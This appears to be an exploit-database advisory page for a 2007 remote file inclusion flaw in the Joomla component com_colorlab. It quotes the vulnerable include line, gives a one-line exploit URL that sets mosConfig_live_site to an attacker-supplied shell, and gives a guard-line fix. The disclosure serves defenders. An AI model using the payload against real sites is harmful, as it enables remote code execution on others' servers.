header-logo
Suggest Exploit
vendor:
com_colorlab
by:
xoron
N/A
CVSS
HIGH
Remote File Include
CWE
Product Name: com_colorlab
Affected Version From:
Affected Version To:
Patch Exists: No
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Joomla com_colorlab Remote File Include

The Joomla component com_colorlab is vulnerable to remote file inclusion. An attacker can exploit this vulnerability to include arbitrary remote files, which could lead to remote code execution.

Mitigation:

To fix this vulnerability, open the admin.color.php file and add the following code before the wrong code:defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );Save and exit the file.
Source

Exploit-DB raw data:

--------------------

Joomla com_colorlab Remote File Include

--------------------

Found : xoron

--------------------

Download:
http://download.joomlaportal.ch/content/view/474/

--------------------

Wrong Code:
include( "$mosConfig_live_site/components/com_color/about.html" );

--------------------

Exploit:
/administrator/components/com_color/admin.color.php?mosConfig_live_site=shell?

--------------------

How to Fix:
1-open admin.colo.php
2-write this codes before wrong codes

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

3-save and exit

--------------------

Thanx: mdx :)

--------------------

# milw0rm.com [2007-10-12]